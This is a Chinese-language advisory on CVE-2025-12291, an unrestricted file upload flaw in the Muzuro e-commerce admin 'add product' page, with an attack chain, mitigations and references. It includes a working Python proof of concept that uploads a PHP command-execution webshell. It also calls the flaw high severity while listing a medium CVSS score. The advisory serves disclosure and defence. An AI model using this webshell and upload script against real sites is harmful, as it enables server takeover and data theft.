CVE-2025-12291: Muzuro电商系统Add Product页面任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-12291

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ashymuzuro Full-Ecommece-Website / Muzuro Ecommerce System

漏洞概述

CVE-2025-12291是发现于ashymuzuro Full-Ecommece-Website和Muzuro电商系统中的一个高危安全漏洞。该漏洞存在于管理后台的添加产品页面（/admin/index.php?add_product）中，由于对文件上传功能缺乏有效的安全验证和过滤，攻击者可以利用此漏洞上传任意类型的恶意文件，包括WebShell脚本（如PHP一句话木马）、恶意脚本文件等。漏洞的CVSS评分为4.7，属于中等严重程度，攻击向量为网络形式，但需要较高的管理员权限才能利用。由于该漏洞的利用代码已被公开披露，且漏洞发现者已联系厂商但未获得回应，因此该漏洞已被标记为可利用状态。攻击者成功利用此漏洞可能导致服务器被完全控制、敏感数据泄露或网站被篡改等严重后果。建议受影响的用户尽快采取防御措施，避免遭受潜在的安全威胁。

技术细节

该漏洞属于典型的任意文件上传（Unrestricted File Upload）漏洞。漏洞存在于Muzuro电商系统的管理后台添加产品功能模块中，具体路径为/admin/index.php?add_product。问题根源在于服务器端未对用户上传的文件类型、内容和扩展名进行严格的验证和过滤。攻击者可以通过构造恶意的文件上传请求，将包含恶意代码的文件（如.php、.phtml、.phar等WebShell文件）上传到服务器。由于系统未对上传文件进行安全检查，恶意文件将被保存在可访问的Web目录中，攻击者随后可以通过直接访问这些上传的文件来执行任意代码，从而实现远程代码执行（RCE）。利用该漏洞需要具备管理员级别的访问权限，这限制了其攻击范围，但由于管理凭据可能通过其他方式泄露或被暴力破解，该漏洞仍然构成严重的安全风险。

攻击链分析

STEP 1

步骤1

攻击者获取管理员访问权限，通过暴力破解、社会工程学或其他方式获取管理后台登录凭据

STEP 2

步骤2

攻击者登录Muzuro电商系统管理后台，访问存在漏洞的添加产品页面（/admin/index.php?add_product）

STEP 3

步骤3

攻击者构造恶意文件上传请求，将包含PHP代码的WebShell文件（如shell.php）作为产品图片上传

STEP 4

步骤4

服务器端未对上传文件进行安全验证，直接将恶意文件保存到Web可访问目录（通常为/uploads/）

STEP 5

步骤5

攻击者通过HTTP请求访问上传的WebShell文件，利用GET参数执行任意系统命令，实现远程代码执行

STEP 6

步骤6

攻击者完全控制服务器，可进行数据窃取、横向移动、部署后门或进一步渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12291 PoC - Muzuro Ecommerce System Unrestricted File Upload
# Affected Component: /admin/index.php?add_product

import requests
import sys

target_url = "http://target.com/admin/index.php?add_product"
session_cookie = "PHPSESSID=your_admin_session_here"

# Create malicious PHP webshell
webshell_content = '''<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    $cmd = $_GET['cmd'];
    system($cmd);
    echo "</pre>";
}
?>'''

def upload_webshell():
    headers = {
        'Cookie': session_cookie,
        'User-Agent': 'Mozilla/5.0'
    }
    
    files = {
        'product_image': ('shell.php', webshell_content, 'application/x-php')
    }
    
    data = {
        'product_name': 'Malicious Product',
        'product_price': '100',
        'submit': 'Add Product'
    }
    
    try:
        response = requests.post(target_url, headers=headers, files=files, data=data)
        if response.status_code == 200:
            print("[+] Webshell uploaded successfully!")
            print("[+] Access shell at: http://target.com/uploads/shell.php?cmd=whoami")
        else:
            print("[-] Upload failed")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    upload_webshell()

影响范围

Muzuro Ecommerce System <= 1.1.0

ashymuzuro Full-Ecommece-Website <= 1.1.0

防御指南

临时缓解措施

立即限制管理后台访问，仅允许受信任的IP地址访问；临时禁用产品图片上传功能或将其迁移到独立的文件服务器；对上传目录设置禁止脚本执行权限（通过.htaccess或Nginx配置）；加强管理员账户安全，使用强密码并启用双因素认证；部署Web应用防火墙（WAF）规则检测异常文件上传行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12291
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12291
3 Details https://www.cvedetails.com/cve/CVE-2025-12291/
4 VulDB https://vuldb.com/cve/CVE-2025-12291
5 Link https://github.com/Lianhaorui/Report/blob/main/FileUpload-1.docx
6 Link https://vuldb.com/?ctiid.329959
7 Link https://vuldb.com/?id.329959
8 Link https://vuldb.com/?submit.675846